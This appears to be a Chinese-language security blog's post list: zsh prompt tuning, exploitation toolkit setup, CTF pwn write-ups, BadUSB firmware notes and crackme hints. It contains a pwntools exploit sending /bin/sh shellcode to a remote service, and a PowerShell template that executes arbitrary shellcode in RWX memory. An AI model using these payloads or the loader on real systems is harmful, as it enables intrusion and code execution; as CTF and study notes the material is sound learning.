Posts

用過prezto與oh-my-zsh的zsh framework以後雖然很方便但是預設會載入一堆插件跟資料，導致開啟shell的時候會有延遲的感覺，尤其進入龐大的git資料夾的時候，速度慢到可以 嘗試自己寫zshrc把會用到的寫進去就好，速度提升不少，git方面採用比較好的做法，先把原本要輸出在Prompt的git訊息輸出到tmp裡面，等跑完以後在資料撈回Prompt 大約如下： setopt prompt_subst # enable command substition in prompt autoload -Uz vcs_info zstyle ':vcs_info:*' enable bzr git hg svn zstyle ':vcs_info:*' check-for-changes true zstyle ':vcs_info:*' stagedstr '%F{green}●%f' zstyle ':vcs_info:*' unstagedstr '%F{yellow}●%f' zstyle ':vcs_info:*' formats ' %b%c%u' zstyle ':vcs_info:*' actionformats " - [%b%c%u|%F{cyan}%a%f]" zstyle ':vcs_info:(sv[nk]|bzr):*' branchformat '%b|%F{cyan}%r%f' zstyle ':vcs_info:git*+set-message:*' hooks git_status ASYNC_PROC=0 ASYNC_DATA="${TMPPREFIX}-prompt_sorin_data" function precmd() { function async() { vcs_info # save to temp file printf "%s" "${vcs_info_msg_0_}" > $ASYNC_DATA # signal parent kill -s USR1 $$ } # do not clear RPROMPT, let it persist # kill child if necessary if [[ "${ASYNC_PROC}" != 0 ]]; then kill -s HUP $ASYNC_PROC >/dev/null 2>&1 || : fi # start background computation async &! ASYNC_PROC=$! } function TRAPUSR1() { # read from temp file RPROMPT="$(cat $ASYNC_DATA)" # reset proc number ASYNC_PROC=0 # redisplay zle && zle reset-prompt } PROMPT='%F{cyan}%n@%m%f %F{green}%~%f # ' RPROMPT='' References ...

搜尋 aptitude search linux-image- 安裝 aptitude install linux-image-xxxx 或是上網找尋deb檔下載安裝 wget http://kr.archive.ubuntu.com/ubuntu/pool/main/l/linux-lts-utopic/linux-image-3.16.0-30-generic_3.16.0-30.40~14.04.1_amd64.deb sudo dpkg -i *.deb 查看kernel安裝紀錄 dpkg --get-selections | grep linux-image 移除舊kernel aptitude remove linux-image-3.19.0-18-generic linux kernel exploits db https://www.kernel-exploits.com/

ub 14.04 x64 i32 lib apt-get install gcc-multilib cd /etc/apt/sources.list.d echo "deb http://old-releases.ubuntu.com/ubuntu/ raring main restricted universe multiverse" >ia32-libs-raring.list apt-get update apt-get install ia32-libs dpkg --add-architecture i386 apt-get update apt-get install libssl-dev:i386 PEDA apt-get install nasm micro-inetd apt-get install libc6-dbg https://github.com/longld/peda qira https://github.com/BinaryAnalysisPlatform/qira pwntools 包含checksec, ROPgadget Tools sudo pip install git+https://github.com/Gallopsled/pwntools#egg=pwntools fix bug cp /usr/local/lib/python2.7/dist-packages/usr/lib/python2.7/dist-packages/capstone/libcapstone.so /usr/local/lib/python2.7/dist-packages/capstone/. rp++ https://github.com/0vercl0k/rp/downloads ncat sudo apt-get install netcat-traditional netcat-openbsd nmap

簡單紀錄一下 PWN1 丟進ida 可以看到 if ( v4 == 0x90909090 ) result = puts(aCensordCensord); else result = printf("Your point is only %d, try hard!\n", v4, v1, v2, v3); return result; 直接塞90結束 python -c 'print "\x90"*1000' | nc 52.69.163.194 1111 PWN2 定位到地20個字以後可以控制eip gdb-peda$ info functions All defined functions: Non-debugging symbols: 0x08048364 _init 0x080483a0 read@plt 可以指到read上,一般來說長這樣 call ret argv1 argv2 argv3 可以控制read的返回地址跟參數,所以可以把ret跟我們shellcode 指到同一個位置上,shellcode的話隨便找一段空⽩白的地⽅方寫上去就好 from pwn import * import time r = remote('127.0.0.1', 4000) read_adr = "\xa0\x83\x04\x08" read = "\x00\x00\x00\x00" + "\x00\xa1\x04\x08" + "\x00\x01\x00\x00" p = "a"*20 + read_adr + "\x00\xa1\x04\x08" + read r.send (p) time.sleep(5) r.send ("\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd \x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68") PWN3 滿多東西始用 qira看的 pwn3首先可以一直push來達成覆蓋ret的效果最後要exit退出達成覆蓋 一開始算一下 pop leak 的值跟我們shellcode 差多遠,計算以後差 36 ,但是會覆蓋 ret 所以ret 以後要給他一個指標 指向我們的shellcode ⽤用%d的話超過0x80000000 要剪掉 0x100000000塞進去的職才會是正常的 我們的payload預計長這樣 ...

https://slides.com/zettain/bad-usb https://github.com/adamcaudill/Psychson 支援設備 Patriot 8GB Supersonic Xpress* Kingston DataTraveler 3.0 T111 8GB Silicon power marvel M60 64GB Patriot Stellar 64 Gb Phison Toshiba TransMemory-MX USB 3.0 16GB Toshiba TransMemory-MX USB 3.0 8GB Kingston DataTraveler G4 64 GB Patriot PSF16GXPUSB Supersonic Xpress 16GB Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K) Kingston Digital 8GB USB 3.0 DataTraveler 取得晶片 型號 下載 Firmware 與 燒錄檔案 Firmware PS2251-03 flash chip http://www.usbdev.ru/?wpfb_dl=777 編譯環境 Visual Studio 2012 SDCC (Small Device C Compiler 安裝路徑 C:\Program Files\SDCC 可以先編譯 DriveCom 和 Injector ...

app1 Hint:HEX app2 Hint:HEX app4 Hint:VB反編譯，OD修改 Hint:OD窗口插件 app5 Hint:觀察ebp附近也存在答案 0040109C 8B4D E0 mov ecx,dword ptr ss:[ebp-20] ; 算法開始 0040109F 83C1 04 add ecx,4 004010A2 894D E0 mov dword ptr ss:[ebp-20],ecx 004010A5 8B55 DC mov edx,dword ptr ss:[ebp-24] 004010A8 83EA 01 sub edx,1 004010AB 8955 DC mov dword ptr ss:[ebp-24],edx 004010AE 837D E0 0D cmp dword ptr ss:[ebp-20],0D 004010B2 73 28 jnb short app5win.004010DC 004010B4 8B45 E0 mov eax,dword ptr ss:[ebp-20] 004010B7 C1E8 02 shr eax,2 004010BA 8B4D F8 mov ecx,dword ptr ss:[ebp-8] 004010BD 8B55 DC mov edx,dword ptr ss:[ebp-24] 004010C0 8B0481 mov eax,dword ptr ds:[ecx+eax*4] 004010C3 3B4495 E8 cmp eax,dword ptr ss:[ebp+edx*4-18] ; 比較ascii,注意堆棧 004010C7 74 11 je short app5win.004010DA 004010C9 68 4C704000 push app5win.0040704C ; invalid password 004010CE E8 20000000 call app5win.004010F3 004010D3 83C4 04 add esp,4 004010D6 33C0 xor eax,eax 004010D8 EB 15 jmp short app5win.004010EF 004010DA ^ EB C0 jmp short app5win.0040109C ; loop跳回 004010DC 8D4D CC lea ecx,dword ptr ss:[ebp-34] 004010DF 51 push ecx 004010E0 68 60704000 push app5win.00407060 ; the password is %s\n app6 Hint:同app5 ...

執行shellcode的模板 $code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = SHELLCOD;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 }; SHELLCOD的地方是要替換的 ...